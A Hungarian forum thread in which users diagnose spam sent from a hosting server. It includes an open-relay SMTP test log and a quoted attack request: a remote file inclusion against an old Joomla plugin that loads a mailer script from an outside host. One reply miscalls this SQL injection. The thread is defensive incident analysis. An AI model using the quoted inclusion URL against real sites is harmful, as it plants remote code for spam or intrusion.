Közlemény

Collapse
No announcement yet.

E-mail küldés

Collapse
X
 
  • Filter
  • Idő
  • Show
Clear All
new posts

  • #16
    ezt írtam én is.. csak vannak olyan domainek is rajta, amit más használ.. azért írtam, hogy ki.. "melyik domain alól" akar lenni.. utána lehet továbbmenni, hogy melyik cms lyukas. és azt lezúzni, frissíteni stb. az, hogy ki, mint személy.. az nem érdekel.. valamelyik köcsög spammer a világ másik oldaláról.. nem sokra mennék vele, ha tudnám, hogy Theodor Smith-nek hívják..

    amit tudni: az info@g-easy.hu-n 36000+ visszapattanó mél van, az info@g-easy az alapértelmezett, így a szerveren lévő összes domain oda vágja vissza. fekete listán vagyok, saját levél már nem megy ki egyáltalán.. ennyi..

    de most cserélik le a teljes mélszerverem, szal valszeg hamarosan megoldódik..
    mérleg

    Comment


    • #17
      Jól gondoltam:
      Kód:
      [B]Mail relay testing[/B]
      Connecting to g-easy.hu for relay test... 
      <<< 220 server.g-easy.hu ESMTP 
      >>> HELO antispam-ufrj.pads.ufrj.br 
      <<< 250 server.g-easy.hu
      ...
      >>> RSET
      <<< 250 flushed
      >>> MAIL FROM:<spamtest@g-easy.hu>
      <<< 250 ok
      >>> RCPT TO:<securitytest%abuse.net@g-easy.hu>
      <<< 250 ok
      Relay test result:
      Hmmm, at first glance, host appeared to accept a message for relay.
      Ez a mailserver nincs rendesen konfigurálva, emiatt tudták használni a spammerek (bárki, én is tudnám használni mail továbbításra).

      Az első néhány próbálkozást még visszaveri, azután végülis átengedi az ismeretlen mailt.
      Ez abszolute nem CMS gond a szerveren. És nem is kell hozzá feltörni egyetlen weblapot sem.
      Ez egy sima mail szerver beállítási gond.
      ---
      Saját SEO szkriptek: Camelpark SEO centrum

      Comment


      • #18
        Ha megkérlek, ezt részleteznéd? Csak mert most tesznek rá újat.. De nem az, aki ezt tette fel.. akkor elvileg nem lesz vele gond? Mi a hiba? Mit kellett volna módosítani? Hogy jöttél rá?
        mérleg

        Comment


        • #19
          Először is megnézem, hogy mi a mail szerver neve:
          G-easy.hu has two name servers, one mail server and two IP numbers. The name servers are amidala.dima.hu and koala.dima.hu. The mail server is mail.g-eas...


          Rögtön látszik, hogy az MX rekod: mx 5 g-easy.hu 212.52.167.214

          Tehát a mail szerver is g-easy.hu
          Most indítok egy Open Relay tesztet itt és itt. Csak írd be a g-easy.hu-t.

          Ezek pillanatok alatt megmutatják bárkinek, hogy ezt pl. lehet használni, mert a hatodik, hetedik próbálkozástól át-átengedi leveleket.
          ---
          Saját SEO szkriptek: Camelpark SEO centrum

          Comment


          • #20
            ki van javítva, új rendszer van megy.. és még így is küldik, hülyét kapok, komolyan.. szal nem a hibát találták meg, hanem csak valamelyik cms a rossz. ááá
            mérleg

            Comment


            • #21
              Megvan!

              Egy régi elfeledett (és átirányított) aldomainen fent marad joomla (régi verzió) volt a bibi..

              ezzel csinálták:

              Kód:
              /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dark-solace.com/blog.txt??
              mérleg

              Comment


              • #22
                Megnéztem a hxxp://dark-solace.com/blog.txt címen lévő scriptet, hogy mit csinál (simán megnyithatod, ez csak egy txt fájl) és valóban ez egy email küldő progi: "PHP-Mailer by MICARI" Maga a script semmi mást nem csinál, csak email-eket lehet küldeni vele. Azt viszont sokat, távvezérléssel.
                Rosszul beállított (magára hagyott) Joomla konfig tette lehetővé ezt az SQL injection támadást.

                Továbbra is állítom, hogy azért tudott működni ez az email küldő script, mert a mail szerver open relay-ként működött.
                (A script sima php mail() függvényt használ.) Ma reggel is ellenőriztem, mostmár nem ez a helyzet, úgy látszik sikerült tagnap beállítani.

                Az más kérdés, hogy ez a sebezhetőség alkalmas (volt) arra, hogy bármilyen php script lefuttatható legyen, pl. iframe tag befecskendezése a weboldalra és hasonlók.

                Gyakorlatilag dupla sebezhetőség vezetett a kálváriádhoz: meghekkelt Joomla és open relay mail szerver
                ---
                Saját SEO szkriptek: Camelpark SEO centrum

                Comment

                Working...
                X